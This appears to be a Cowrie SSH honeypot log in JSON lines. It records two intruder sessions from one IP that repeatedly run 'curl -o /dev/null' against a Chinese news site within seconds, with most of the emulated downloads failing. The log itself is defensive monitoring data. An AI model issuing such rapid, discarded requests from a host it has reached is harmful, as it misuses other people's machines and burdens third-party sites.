{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.979330Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.980371Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.993518Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:33.995007Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:33.999319Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.000145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.034286Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.035378Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.038772Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.041235Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.060328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.061359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.077549Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.093676Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.094941Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.121248Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.122154Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.151875Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.152744Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.162436Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.178517Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.179476Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.203759Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.211128Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.212199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.239303Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.240938Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.248132Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.248914Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.281348Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.366977Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.368046Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.393477Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.394378Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.414973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.415814Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.431571Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.432472Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.450765Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.451599Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.472488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.473308Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.547551Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.575126Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.576208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.592726Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.593524Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.624781Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.625774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.628547Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.638459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.639555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.662501Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.666082Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.666839Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.679053Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.680034Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.701671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.702559Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.704787Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.716150Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.716911Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.738242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.739038Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.754865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.755740Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.775284Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.776264Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.788595Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.832819Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.833533Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.854174Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.912449Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.913494Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.940973Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:34.962419Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:34.963475Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.000798Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.001883Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.002940Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.045007Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.046036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.098836Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.100353Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.104545Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.105373Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.137256Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.138808Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.152740Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.153610Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.181378Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.182343Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.208775Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.209930Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.239453Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.240488Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.276197Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.278702Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.321623Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.323732Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.359326Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.361157Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.365252Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.366188Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.396747Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.398196Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.399078Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.402689Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.423852Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.424827Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.441163Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.443882Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.444813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.479468Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.481287Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.483816Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.499469Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.516755Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.517713Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.520318Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.521284Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.526032Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.543942Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.556567Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.557535Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.559910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:35.560760Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:35.602071Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
